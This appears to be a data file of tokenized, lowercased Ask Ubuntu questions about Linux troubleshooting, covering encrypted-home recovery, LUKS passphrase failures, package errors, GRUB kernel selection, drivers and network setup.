512831	recover home folder with randomly generated encryption passphrase	i forgot my user password after not using the pc for a month . i 'm running kubuntu 13.10 . i reinstalled kubuntu with a live usb and kept the home partition , that basically changed the user password but not the passphrase to access the home folder , and the log in screen just loops and brings me back to itself whenever i enter the new correct user password . i believe the passphrase to access the home folder is my old user password which i do n't remember . i am a noob and do n't know what to do now . i have the randomly generated passphrase that kubuntu generated on first reboot before the reinstallation ( what the guy talks about under 'back up encryption passphrase ' here http : //www.howtogeek.com/116297/how-to-recover-an-encrypted-home-directory-on-ubuntu/ ) is there a way i can work with that to recover my home partition ? if i run ecryptfs-unwrap-passphrase ~/.ecryptfs/wrapped-passphrase and enter the randomly generated passphrase it does n't work .
512833	how to install micromax 353g in ubuntu	i used my micromax 353g usb modem with windows 8 . now that i have installed ubuntu 14.04 i want to run in it . suggest me ways .
512834	why is there a man entry in /etc/passwd	i 've noticed that there is an entry for the man user in my /etc/passwd file . what is the purpose of this user ? man : x:6:12 : man : /var/cache/man : /bin/sh
512841	package xxxx and python-xxxx	i am trying to install the latest version of package xxxx . i downloaded , unarchived and follow the readme : python setup-py install but python does not see my latest version . it seems that there is a python-xxxx package already installed ( older version of xxxx ) and python uses that i think . how do i remove this conflict ? can i just apt-get remove python-xxxx ? but would that cause dependencies problem ? ( arrgh , i am spending more time on installation issues than getting actual work done ... )
512843	how to install libqt4-webkit ?	new version of skype requires libqt4-webkit , but when i trying to install it i get this error : web @ web-x501a1 ~ $ sudo apt-get install libqt4-webkit [ sudo ] password for web : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : libqt4-webkit 0 upgraded , 1 newly installed , 0 to remove and 5 not upgraded . need to get 9,140 b of archives . after this operation , 133 kb of additional disk space will be used . warning : the following packages can not be authenticated ! libqt4-webkit install these packages without verification [ y/n ] ? y err http : //archive.ubuntu.com/ubuntu/ quantal-updates/universe libqt4-webkit i386 4:4.8.3+dfsg-0ubuntu3.4 404 not found [ ip : 91.189.91.15 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/q/qt4-x11/libqt4-webkit_4.8.3+dfsg-0ubuntu3.4_i386.deb 404 not found [ ip : 91.189.91.15 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? already tried apt-get update and -- fix-missing
512844	luks - after suspended the password not match	i have very big trouble . i have ubuntu 14.04 ( standard instalation with full disc ecryption - luks ) . yesterday i suspended my laptop and after few hours my laptop was discharged . when i turned on my laptop then my password in the luks did n't work . i am 100 % sure that this password is correct and my system locale is good . i checked also this password in the other ubuntu ( live cd version 14.04 ) and i had the same problem ( no key available with this passphrase ) . i got this message on my console : no key available with this passphrase . i do n't know this is some logs from my computer : logs from cryptsetup repair is very strange because imho everything is ok. how can i get proof that e.g header is broken or keyslot is broken ? what to do . have i lost all my data ? please help me . freeman @ freeman : ~ $ sudo cryptsetup -v luksdump /dev/sda5 luks header information for /dev/sda5 version : 1 cipher name : aes cipher mode : xts-plain64 hash spec : sha1 payload offset : 4096 mk bits : 512 mk digest : 60 88 7c 28 18 69 31 42 ce 4d 64 a0 20 9f f1 95 fb 03 e6 9b mk salt : 26 e8 60 b4 55 7b bd c6 8a 0c 2c 23 a3 9a 38 b2 cd 5a 77 7e 45 ba 68 e1 ae 52 ce 8c f9 e9 70 8c mk iterations : 35250 uuid : d7431ab7-c761-4e7f-a1b9-5d7bc77f20cd key slot 0 : enabled iterations : 140968 salt : 3b 86 ac 53 70 70 1e 84 06 fc 7f 9b 16 bc ac 14 c0 6a 7f a6 18 10 3c 81 a7 9d d4 95 4d 3f 2a f8 key material offset : 8 af stripes : 4000 key slot 1 : disabled key slot 2 : disabled key slot 3 : disabled key slot 4 : disabled key slot 5 : disabled key slot 6 : disabled key slot 7 : disabled command successful . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- freeman @ freeman : ~ $ sudo cryptsetup luksopen /dev/sda5 aaa enter passphrase for /dev/sda5 : no key available with this passphrase . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # cryptsetup 1.4.3 processing `` cryptsetup luksopen /dev/sda5 test231 -- debug '' # running command luksopen . # locking memory . # allocating crypt device /dev/sda5 context . # trying to open and read device /dev/sda5 . # initialising device-mapper backend , udev is enabled . # detected dm-crypt version 1.12.1 , dm-ioctl version 4.25.0 . # trying to load luks1 crypt type from device /dev/sda5 . # crypto backend ( gcrypt 1.5.0 ) initialized . # reading luks header of size 1024 from device /dev/sda5 # timeout set to 0 miliseconds . # password retry count set to 3 . # password verification disabled . # iteration time set to 1000 miliseconds . # activating volume test231 [ keyslot -1 ] using [ none ] passphrase . # dm status test231 of [ 16384 ] ( *1 ) # interactive passphrase entry requested . enter passphrase for /dev/sda5 : # trying to open key slot 0 [ active_last ] . # reading key slot 0 area . # dm-uuid is crypt-temp-temporary-cryptsetup-7649 # udev cookie 0xd4de08b ( semid 2818048 ) created # udev cookie 0xd4de08b ( semid 2818048 ) incremented to 1 # udev cookie 0xd4de08b ( semid 2818048 ) incremented to 2 # udev cookie 0xd4de08b ( semid 2818048 ) assigned to create task ( 0 ) with flags > > disable_subsystem_rules disable_disk_rules disable_other_rules ( 0xe ) # dm create temporary-cryptsetup-7649 crypt-temp-temporary-cryptsetup-7649 of [ 16384 ] ( *1 ) # dm reload temporary-cryptsetup-7649 ofrw [ 16384 ] ( *1 ) # dm resume temporary-cryptsetup-7649 ofrw [ 16384 ] ( *1 ) # temporary-cryptsetup-7649 : stacking node_add ( 252,0 ) 0:6 0660 [ verify_udev ] # temporary-cryptsetup-7649 : stacking node_read_ahead 256 ( flags=1 ) # udev cookie 0xd4de08b ( semid 2818048 ) decremented to 1 # udev cookie 0xd4de08b ( semid 2818048 ) waiting for zero # udev cookie 0xd4de08b ( semid 2818048 ) destroyed # temporary-cryptsetup-7649 : processing node_add ( 252,0 ) 0:6 0660 [ verify_udev ] # temporary-cryptsetup-7649 : processing node_read_ahead 256 ( flags=1 ) # temporary-cryptsetup-7649 ( 252:0 ) : read ahead is 256 # temporary-cryptsetup-7649 ( 252:0 ) : setting read ahead to 256 # udev cookie 0xd4dcce0 ( semid 2850816 ) created # udev cookie 0xd4dcce0 ( semid 2850816 ) incremented to 1 # udev cookie 0xd4dcce0 ( semid 2850816 ) incremented to 2 # udev cookie 0xd4dcce0 ( semid 2850816 ) assigned to remove task ( 2 ) with flags ( 0x0 ) # dm remove temporary-cryptsetup-7649 oft [ 16384 ] ( *1 ) # temporary-cryptsetup-7649 : stacking node_del [ verify_udev ] # udev cookie 0xd4dcce0 ( semid 2850816 ) decremented to 1 # udev cookie 0xd4dcce0 ( semid 2850816 ) waiting for zero # udev cookie 0xd4dcce0 ( semid 2850816 ) destroyed # temporary-cryptsetup-7649 : processing node_del [ verify_udev ] # trying to open key slot 1 [ inactive ] . # trying to open key slot 2 [ inactive ] . # trying to open key slot 3 [ inactive ] . # trying to open key slot 4 [ inactive ] . # trying to open key slot 5 [ inactive ] . # trying to open key slot 6 [ inactive ] . # trying to open key slot 7 [ inactive ] . no key available with this passphrase . # interactive passphrase entry requested . ubuntu @ ubuntu : ~ $ sudo cryptsetup repair /dev/sda5 -- debug # cryptsetup 1.6.1 processing `` cryptsetup repair /dev/sda5 -- debug '' # running command repair . # locking memory . # installing sigint/sigterm handler . # unblocking interruption on signal . # allocating crypt device /dev/sda5 context . # trying to open and read device /dev/sda5 . # initialising device-mapper backend library . # trying to load luks1 crypt type from device /dev/sda5 . # crypto backend ( gcrypt 1.5.3 ) initialized . # reading luks header of size 1024 from device /dev/sda5 # key length 64 , device size 499615744 sectors , header size 4036 sectors . no known problems detected for luks header . # releasing crypt device /dev/sda5 context . # releasing device-mapper backend . # unlocking memory . command successful .
512845	some fonts come up as fractions in applications	my skype has long since been using a fraction font to display caller names . this looked funny but did n't bother me since i knew who i was calling . however now i am trying to login with the everpad application and the boxes will not allow me to type the correct characters . i do use ibus for chinese character input . i looked through my fonts and did n't see one that makes letters into fractions , i used both the writer and fontviewer to go through all the fonts . how should i adjust my font ?
512848	tex-common troubleshooting on ubuntu 14.04 lts	i recently upgraded my computer from 12.02 lts to 14.04 lts , but experienced problems with launching google chrome and being able to use rhythmbox . rhythmbox asked if i wanted to install additional software , but the installation failed and returned this error message : package tex-common 4.04 failed to install/upgrade : errormessage : subprocess installed post-installation script returned error exit status 1 i found this thread on launchpad about the bug : https : //bugs.launchpad.net/ubuntu/+source/tex-common/+bug/1236951 which offered some suggestions about fixing the error , but the ones i have tried have n't worked for me . first , i tried these commands ( although i think rm /etc/texmf/ did n't work , i got an error message telling me it was a directory ) . this did n't seem to fix the error . sudo apt-get remove -- purge tex-common texlive-* sudo rm /etc/texmf/ sudo apt-get install tex-common sudo apt-get install texlive-base sudo apt-get install texlive-latex-recommended i then tried : sudo apt-get purge tex-common sudo -e do-release-upgrade -d sudo -e apt-get -y install tex-common texlive-base texlive-latex-recommended but again , it did n't seem to fix the problem . finally , i tried the last suggestion in the thread : uninstall everything to do with emacs and xemacs ( i used synaptic package manager , to find what to remove and to completely remove ) i did n't actually do this step because a . ) i did n't know if i had any issues with emacs and xemacs , and b . ) because i do n't know how to use synaptic to do uninstall only the emacs and xemacs stuff . uninstall tex-common and all texlive-* files and sudo rm -rf /etc/texmf this time the command worked , which i assume is because this one removes the files in texmf , instead of the directory itself . remove all texlive files ( if any ) e.g . sudo rm -rf /usr/local/texlive/2014 rm -rf ~/.texlive2014 install emacs24 then auctex using synaptic package manager install tex-common using synaptic package manager again , i did n't install emacs24 and auctex , and when it came to installing tex-common , i just tried : sudo apt-get install tex-common install texlive following the instructions on http : //tug.org/texlive/ ( installation from dpkg or ubuntu software centre or synaptic package manager do n't work for me . ) add paths to /etc/environment as suggested by the installation program earlier . that is , for the version i installed , to the end of the path line add : /usr/local/texlive/2014/bin/x86_64-linux just before the closing '' and add 2 new lines infopath= '' : /usr/local/texlive/2014/texmf-dist/doc/info '' manpath= '' : /usr/local/texlive/2014/texmf-dist/doc/man '' ( without the colon , the manpath to everything except tex will be broken ) i think i understood how to do this section , although it 's the first time i 've ever tried to set a path . also , based on another thread , i used i386-linux instead of x86_64-linux . edit /etc/manpath.config by adding line manpath_map /usr/local/texlive/2014/bin/x86_64-linux /usr/local/texlive/2014/texmf-dist/doc/man after the last manpath_map line that already exists . originally i was n't able to edit the manpath.config file as it was read-only , so i had to open the file with sudo vim to edit it . after going through all of these steps and restarting , the problem is now worse , as i have to go ubuntu , with linux 3.13.0-34-generic ( recovery mode ) for anything to work . otherwise there will be no icons along the top of the screen ( such as battery , network , etc . ) and the icons in the toolbar will not respond . would anyone be able to help me with this ? i do n't really know enough about what i 'm doing to know if i 'm doing something stupid or not .
512849	ubuntu 14.04 15 minutes boot time	my computer is extremely slow booting up ( about 15 minutes ) . when i press the power button the monitor will display a black screen with purple border for 15 minutes , then it boot up like normal ubuntu . my spec is hp compaq dc5800 small form factor . and today syslog is http : //www.mediafire.com/view/y2uu2k2k0k9fn04/aug_18_08.docx thanks for your help .
512851	make home folder accesible to different installations	i just installed 14,04 next to 12,02 and i want to copy my home folder from my previous installation to my new one . i get permission errors ( can not read files ) . how to change that ? thanks .
512853	reusing disk partition during ubuntu installation	is there a way to tell partman to re-use current disk layout/lvm layout when using preseeding ? either that or bypass partman completely ? i 'm using a custom preseed file with my own partman recipe . but i can not find a way to tell partman to re-use an existing lvm configuration and just format the logical volumes .
512855	ubuntu 14.04 kernel upgrades not changing default	so i have 3.13.0-34 & 3.13.0-33 & 3.13.0-24 all installed but the system constantly sticks with 3.13.0-24. update-grub does not seem to change this . grub configuration says boot entry 0 . i 'm at a bit of a loss what to do next but want to keep my kernel updated when i do a dist-upgrade , currently it installs the newer kernel packages but never uses anything but 3.13.0-24 . the output of uname -a . $ uname -a linux < hostname > 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux the contents of /boot . $ ls /boot abi-3.13.0-24-generic memtest86+.bin abi-3.13.0-33-generic memtest86+.elf abi-3.13.0-34-generic memtest86+_multiboot.bin config-3.13.0-24-generic system.map-3.13.0-24-generic config-3.13.0-33-generic system.map-3.13.0-33-generic config-3.13.0-34-generic system.map-3.13.0-34-generic grub vmlinuz-3.13.0-24-generic initrd.img-3.13.0-24-generic vmlinuz-3.13.0-33-generic initrd.img-3.13.0-33-generic vmlinuz-3.13.0-34-generic initrd.img-3.13.0-34-generic here is the grub.cfg info requested . $ grep ubuntu /boot/grub/grub.cfg menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-050e1e34-39e6-4072-a03e-ae0bf90ba13a ' { submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-050e1e34-39e6-4072-a03e-ae0bf90ba13a ' { menuentry 'ubuntu , with linux 3.13.0-34-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-34-generic-advanced-050e1e34-39e6-4072-a03e-ae0bf90ba13a ' { menuentry 'ubuntu , with linux 3.13.0-34-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-34-generic-recovery-050e1e34-39e6-4072-a03e-ae0bf90ba13a ' { menuentry 'ubuntu , with linux 3.13.0-33-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-33-generic-advanced-050e1e34-39e6-4072-a03e-ae0bf90ba13a ' { menuentry 'ubuntu , with linux 3.13.0-33-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-33-generic-recovery-050e1e34-39e6-4072-a03e-ae0bf90ba13a ' { menuentry 'ubuntu , with linux 3.13.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-advanced-050e1e34-39e6-4072-a03e-ae0bf90ba13a ' { menuentry 'ubuntu , with linux 3.13.0-24-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-recovery-050e1e34-39e6-4072-a03e-ae0bf90ba13a ' { and the output of `` sudo update-grub '' . $ sudo update-grub generating grub configuration file ... found linux image : /boot/vmlinuz-3.13.0-34-generic found initrd image : /boot/initrd.img-3.13.0-34-generic found linux image : /boot/vmlinuz-3.13.0-33-generic found initrd image : /boot/initrd.img-3.13.0-33-generic found linux image : /boot/vmlinuz-3.13.0-24-generic found initrd image : /boot/initrd.img-3.13.0-24-generic found memtest86+ image : /boot/memtest86+.elf found memtest86+ image : /boot/memtest86+.bin done
512858	ca n't adjust screen brightness ( (	ca n't adjust screen brightness from anywhere . nor by specific buttons on the laptop keyboard , nor by setting in `` brightness and lock '' i 've tried to configure the grub file like it mentioned in a lot of instruction , but noe success . when i 'm pressing the brigtness buttons on a keyboard i get a bar appeard on screen but there 's only two positions and no any actual brightness changes ( ( ( unfrtunately could n't attache images due to lack of reputation ( do somebody knows how to fix it ? thanks in avdvance .
512862	failover/ gateway issue . help please	hope someone can help , this would be excellent . i’ve ubuntu dhcp server ( 10.04 ) , which works great ( many thanks to everyone who helped me in this excellent forum ) . this server has 2 cards , eth0 for dhcp ( 172.20.32.11 ) and the other one eth1 ( 10.0.19.11 ) , it’s basically a vlan , but acts as access to the internet , the gateway for this vlan is 10.0.19.5 . as mentioned , it works really great , no issues with it . anyway , in my hdcp config i had to use eth1 as gateway for eht0 , this means in clients devices the e.g ipconfig shows the ip of ethe 1 as gateway ( 10.0.19.11 ) . we have over 40 devices which have ( must have ) static ips , so the gateway in those devices has to be the ip-address of eth1 ( 10.0.19.11 ) , which is no problem . now i need to configure a second ubuntu dhcp , and run them in failover / backup mode . the second server is configured but has to have different ip-addresses , i use for eth 0 ( for dhcp ) 172.20.32.12 and for eth 1 10.0.19.12 ( like the first one , it’s the same vlan and acts as access to the internet , the gateway for this vlan is 10.0.19.5 . the problem is , in case server 1 goes down then all devices with static ips lose the access to the internet , and that’s logical because they look for eth 1 in server 1 which is down , so i would have to change the gateway in all devices with static ips to the ip-address of eth1 in the second server . i’ve tried to use the gateway of the vlan ( 10.0.19.5 ) in dhcp config instead of the ip addresses of the eth 1 but no success . if i could use the same gateway for both servers ( which would be 10.0.19.5 ) then my problem is solved . i’ve been searching in the net for an idea or solution but really nothing so , please is there anyway to do this , maybe in the iptables ? the iptable i am using at the moment is as follows : iptables -t nat -a postrouting -o eth0 -j masquerade iptables -a forward -i eth0 -o eth1 -m state -- state related , established -j accept iptables -a forward -i eth1 -o eth0 -j accept i would appreciate any help , this would be great madona
512863	ctrl shortcuts not working in terminal	i use these two shortcuts to terminate a process and clear the window , respectively : ctrl + c ctrl + h however , they are not working today . no idea why . they are completely ignored by the terminal . what are the reasons for this and how can i get it working ? something to do with keyboard layout ? i 've verified from the keyboard layout chart that i 'm pressing ctrl + c. so why is terminal ignoring me ?
512867	unable to install/recover jenkins after upgrading from ubuntu 12.04 to 14.04	i did an upgrade of ubuntu from 12.04 to 14.04 and was surprised to discover that my earlier installed and configured jenkins is broken . to add to the misery , if i do an apt-get install jenkins or apt-cache search jenkins . i do not see either jenkins or jenkins-cli or jenkins-common . if i do an apt-get install jenkins , i get the error : buildman @ pluto : ~ $ sudo apt-get install jenkins reading package lists ... done building dependency tree reading state information ... done package jenkins is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'jenkins ' has no installation candidate my os details : buildman @ pluto : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty any pointers on how to get out of the mess ( that i created ) would be of great help .
512870	ubuntu does n't recognize my wireless usb adaptor	i need a little help as i am new to ubuntu . my ubuntu is not recognizing my wireless usb adptor . i have already installed the drivers through windows wireless drivers . but it shows that no hardware is plugged in ... but the adaptor is plugged in . please help as i am in an urgent need of using the wifi network . all suggestions are welcome . thanks in advance .
512871	find children of the process	is there any way to know , who are children of the specific process ? for example those children which their parent id is foo ?
512873	nvidia driver for quadro fx 330 in ubuntu 14.04.1 , kernel module load error	my ubuntu computer ( pentium-d , 64-bit ) has sofar worked well in ubuntu upgrades . the only down-side of the old and exotic configuration has been that i need to compile the driver each time a kernel upgrade is made . after 14.04.1 ( lts upgrade ) , the nvidia driver ( the file nvidia-linux-x86_64-173.14.39-pkg2.run from the nvidia driver site ) failed to load ( the compilation just produced warnings but loading of the kernel module failed ) . i had strictly followed the instructions on this site ( ubuntu 14.04 install nvidia driver ) including the removal of the nouveau modules . the error message i get is : error : unable to load the kernel module 'nvidia.ko ' . this happens most frequently when this kernel module was built against the wrong or improperly configured kernel sources , with a version of gcc that differs from the one used to build the target kernel , or if a driver such as rivafb , nvidiafb , or nouveau is present and prevents the nvidia kernel module from obtaining ownership of the nvidia graphics device ( s ) . please see the log entries 'kernel module load error ' and 'kernel messages ' at the end of the file '/var/log/nvidia-installer.log ' for more information . the only `` kernel module load error '' i can find in /var/log/nvidia-installer.log was : - > kernel module load error : insmod : error : could not insert module ./usr/src/nv/nvidia.ko : unknown symbol in module the `` kernel messages '' look even less informative . is there anything i should try ( except trying to find a newer , less exotic computer ) ? ciao yrjo
512874	mts dongle software is not installing in my ubuntu14.04	i have my new mts dongle . it is working in windows and is detected in ubuntu 14.04 . but the software is not installed and hence cant access internet
512880	ubuntu for all in ones	i have a lenovo ideacentre b320 . ever time i try to install ubuntu a blank screen appears and nothing happens . is this because i have an all in one and not a conventional dekstop ? ?
512884	what lines should be commented out in my sources.list file ?	i have just updated from ubuntu 12.04 to 14.04 last weekend . i have n't downloaded any extra programs as of yet . i checked my sources.list file and it has the following lines in it : deb http : '' //gb.archive.ubuntu.com/ubuntu trusty main restricted universe multiverse # deb http : '' //security.archive.ubuntu.com/ubuntu/ raring-security main restricted universe multiverse # deb http : '' //archive.ubuntu.com/ubuntu/ raring-updates main restricted universe multiverse i am concerned that the security line is commented out . i know it is an old version , but i 'd like to know whether there should be a newer version of this line that is n't commented out ?
512885	firefox becomes very slow , showing spinning circle `` connecting '' for ages , ipv6 is disabled , no proxy , and disabling addons does n't work	so i am a brand new ubuntu user , and just getting the feel of the os . tried it on a friends computer , and really liked the system . have just done a full install of 14.04 on an asus ux32a ( originally running windows 8 ) . however , this system has given me the painful problem of firefox becoming unbearably slow . quite often , my tabs show `` connecting '' for an eternity , either before loading or not loading at all . sometimes pages only partially load , and youtube videos often get stuck halfway through . i am connected to my home wifi . i have disabled ipv6 in both firefox ( through about : preferences ) and the os ( through the terminal - both from `` nano /etc/sysctl.conf '' and grub ) . firefox is no longer connected through a proxy , and disabling/enabling addons has had no effect . after disabling the ipv6 it seemed that the problem was solved , but after a few uses it has returned . when the problem is not there , the system runs beautifully . no other device connected on the same home network has this problem ( windows 7 , 8 , ios , iphone , etc ) . when the problem exists my internet becomes all but unusable , so this is obviously a major inconvenience for me . i have searched through askubuntu and tried many different solutions , but to no avail . i am giving up and asking my own question . any help would be massively appreciated ! note : i noticed that when my laptop is plugged in and above 20 % battery , i do n't seem to have the problem . this could be a complete coincidence , and i have n't taken the time to observe it . i do n't think they should be related , but i 'm sure someone out there knows better than me .
512889	install ubuntu on nokia x smartphone	i 'm fan of ubuntu os . i want to install ubuntu on my nokia x smartphone . can you please help to do it ?
512890	restore factory setting option in boot menu not working	when i switch on my laptop , after few seconds boot menu comes where restore to factory setting option is available but when i click enter to that then nothing happens.i am using ubuntu 12.04lts and once i had restored my computer to factory setting but now i am unable to do that , in fact recovery option is also not responding.and kernel is also missing.please tell me how can i fix the problem and make my computer completely new.and i do n't want to re-install it.i am a new user to ubuntu so please tell each step in detail . **note : i do n't have any cd rom option in my laptop.so please tell me solution which does not require cd rom .
512893	how to install boot repair in ubuntu 12.04lts without cd	please tell me how to install boot repair without any cd and terminal command.please provide simple way to install it and tell me after installing boot repair where it is located and how to use it . i am using ubuntu 12.04lts and my laptop does not have cd rom . i just want to repair boot menu which is not working when i enter restore factory settings or any other option except normal boot
512894	the operating system i use is ubuntu version 13.04 . how do we upgrade it to ubuntu version 13.10 ?	the operating system i use is ubuntu version 13.04 . how do we upgrade it to ubuntu version 13.10 ?
512895	asks to mount partition on boot	so , when i 'm booting in to my fresh installed ubuntu on booting window strange question occurs , system asks me whether i want to mount /dos partition , even though that partition was reformatted to fat32 file system through gparted app . i can mount that partition while logged in to ubuntu os , is there any ways to remove that annoying question ? directory that in my opinions causes this problem is dev/sda6 os - ubuntu 14.04 64bit . image 1 image 2
512898	ubuntu 14.04 does n't load after upgrade	i upgraded my ubuntu from 12.04 to 14.04 and now it keep loading and never boots . sometimes the login page appears and after entering the correct password the page simply splashes and nothing happens . i 'm also not able to go on a guest session . any tips ?
512902	unable to install ethernet driver in 14.04lts	**strong text**recently i had installed ubuntu 14.04 lts 64-bit . it is dual-boot with windows 7 ultimate . the ethernet works good in windows but in ubuntu does not work.actually , it worked for 2-3 days , then suddenly it stopped .. so , i tried to reinstall the driver ( rtl8101e/rtl8102e ) , but every time it shows error asking about the `` private key '' ... what is this private key ? ... wireless works very much fine ... . plzz post ur suggestions regarding this problem ? ?
512903	connecting to dsl on asus k53sv	i have recently switched to linux mint 17 . i 've been unable to connect it to internet using dsl connection . the connection was working fine on another system , i had unplugged it and tried to access using the same username and password . the authentication prompt keeps appearing and it does n't go any further . is it that there is a conflict at the host because the account was in use from a different system . is n't dsl account transferable ?
512905	what exactly is tlp doing that default system config would n't ?	all the info about tlp on the surface looks more like advertisement and marketing to me , i ca n't see any detailed comparison to default configurations . what are the precise differences compared to default ( k/l ) ubuntu installs under the hood , are they really effective ? update : and if they really are , why are n't they a part of a default config ?
512909	disable mouse wheel doubleclick	my mouse 's wheel sometimes doubleclicks instead of single click . looks like hardware issue . how can i prevent sending another wheel click for one second for example ?
512911	script for changing resolution !	i need help writing a script/program that changes my resolution . when i click on that program i want it to change the resolution . i 'm pretty new to ubuntu , but i gave it a try and wrote one on my own , but with no success . so , please help me out ! i 'm running ubuntu 14.04 . i followed this instruction : how can i create an executable in linux ( beginner ) ? i found that this command line worked : xrandr -- output lvds1 -- mode 1366x768 now i need help turning it into a script ! : ) ok , so now i created a new textdocument with the name `` res '' and wrote : # ! /usr/bin chmod +x res.desktop xrandr -- output lvds1 -- mode 1366x768 in the terminal i created a .desktop file and wrote : [ desktop entry ] type=application terminal=true name= < resolution > exec= < ~/desktop/res > the problem now is that there is no file on my desktop except the textdocument.. sorry for being quiet the noob on this : )
512912	how can i get blueman to connect to my apple magic trackpad on startup ?	after a lot of work , i finally managed to get my apple magic trackpad to work on ubuntu , by ditching the default bluetooth app for blueman . the problem is , every time i start up my machine , i have to launch blueman , select my device , and choose the menu item `` connect to input service . '' how can i get this to happen automatically on startup ? edit : is there no solution to this ?
512915	samba password expires ?	i have a problem with samba , i have a user and a password for that user , and from a windows machine it let 's me log in but after a few hours i try to log in again and it tells me that the password is wrong ; so i reset the same password in the server and it works again ; then , after a few hours it tells me it 's wrong ... . any ideas what might be going wrong ? thanks !
512916	how to access an androidphone 's filesystem	i want to have access to my rooted android-phone 's filesystem using a usb-cabel-connection and either a terminal or file manager with gui . i also want to be able to edit the system files using vim or any other text editor of my choice . is this possible ? how is this enabled ? i have tried this method but i got this error in the almost last step : $ source ~/.bashrc bash : alias : -o : not found bash : alias : allow_other : not found bash : alias : /media/androiddevice/ : not found bash : alias : -u : not found bash : alias : /media/androiddevice/ : not found and android-connect doesnt work fine : ~ $ android-connect unable to open ~/.mtpz-data for reading , mtpz disabled.listing raw device ( s ) device 0 ( vid=12d1 and pid=1051 ) is a huawei honor u8860 . found 1 device ( s ) : huawei : honor u8860 ( 12d1:1051 ) @ bus 1 , dev 7 attempting to connect device ignoring libusb_claim_interface ( ) = -6ptp_error_io : failed to open session , trying again after resetting usb interface libmtp libusb : attempt to reset device inep : usb_get_endpoint_status ( ) : resource temporarily unavailable outep : usb_get_endpoint_status ( ) : device or resource busy ignoring libusb_claim_interface ( ) = -6libmtp panic : failed to open session on second attempt unable to open raw device 0
512917	firefox asks to install flash , then plugin finder says `` no suitable plugins were found . ''	every time i visit a site that contains a flash object , the firefox plugin finder asks me to install flash , but when i click to install it , it reports that `` no suitable plugins were found . '' i know i can install flash manually using apt-get or something , but how can i get firefox to do what it 's apparently supposed to do here ?
512918	how do i list all available shell builtin commands ?	we know bash supports number of buitin commands like : $ type type cd help command type is a shell builtin cd is a shell builtin help is a shell builtin command is a shell builtin i want to get list of all available shell builtin commands . how do i do that by command-line ?
512921	ubuntu 14.04 amd/intel hybrid battery backup low	i have a dell inspiron 3521 with amd/intel hybrid graphics . now i have read that ubuntu 14.04 with 3.13 kernel version has a dynamic power management feature . although my system is not heating up as before , but the battery backup is just 2 hours or less : ( so is dpm working or not ? will there be any solution in the future kernels versions ? what should i do ?
512923	removing idle-python2.7 in ubuntu 12.04	i 'm having some issues when updating packages on ubuntu 12.04 : processing triggers for menu ... errors were encountered while processing : idle-python2.7 setting up idle-python2.7 ( 2.7.3-0ubuntu3.5 ) ... traceback ( most recent call last ) : file `` /usr/lib/python2.7/compileall.py '' , line 16 , in < module > import struct file `` /usr/lib/python2.7/struct.py '' , line 1 , in < module > from _struct import * importerror : no module named _struct dpkg : error processing idle-python2.7 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 i believe it can be related with idle-python2.7 and i want to remove it with : sudo apt-get remove idle-python2.7 to see if that fixes it , but i 'm afraid i 'll bork my system . can i safely remove that package ? how can i run a `` trial removal '' to see what would be removed along with it ?
512926	how to configure wifi adaptor to monitor mode	i have just successfully installed a driver ( athk9_htc ) for tp-link tl-wn722n ( a usb wifi adaptor ) in ubuntu 14.04.1 . my goal is to capture the wifi traffic with wireshark . i try to configure the adaptor to monitor mode by running : sudo iwconfig wlan1 mode monitor however it give me an error message : error for wireless request `` set mode '' ( 8b06 ) : set failed on device wlan1 ; device or resource busy . how can i set it to monitor mode ? thank you very much
512929	how to install ubuntu without deleting my other drives ?	i have tried 3 times to install ubuntu . but every time i dont know how deleted all my drives , along with system drive . how to install ubuntu without deleting those ? i have 2 drives in my hard disk . 1 is dedicated for system . can anyone help ?
512931	how do i export outlook 2013 mails and contacts to thunderbird ?	i would like to export all of my emails and all of my contacts from outlook 2013 to thunderbird on ubuntu 14.04 lts . i do not want to install thunderbird on windows to do this .
512935	where are stored ssh client private keys ?	on client , after i do ssh-add to add my private key everything works fine , ssh-add-l lists key and i can connect to hosts that have corresponding public key , but nothing changes in .ssh dir as it supposed to.so my question is : how can i locate dir in which are stored private keys added by ssh-add ?
512940	creating a steam library on flash drive problems	basically . i have steam installed but i want to install games onto a flash drive since i do n't have enough space on the ssd . when i try to add library folder on the flash drive i get this message '' new steam library folder must be on a filesystem mounted with execute permissions '' if i try to install the game straight to the folder i get the same message . please could someone give me a tutorial or tell me how to fix it so i can complete the task . step by step would be nice !
512941	configure canon printer	i have a canon mg2120 . i want to install drivers for the printer and the scanner . i am on ubuntu 14.04 i am a complete novice and need to be told what and where to go to install ... i have the terminal on side bar but need to know commands , as i said , i need a lot of guidance , do n't know much , yet , i 'm learning and hopeful ; hate windows 7 , 8 , 8.1. need out .
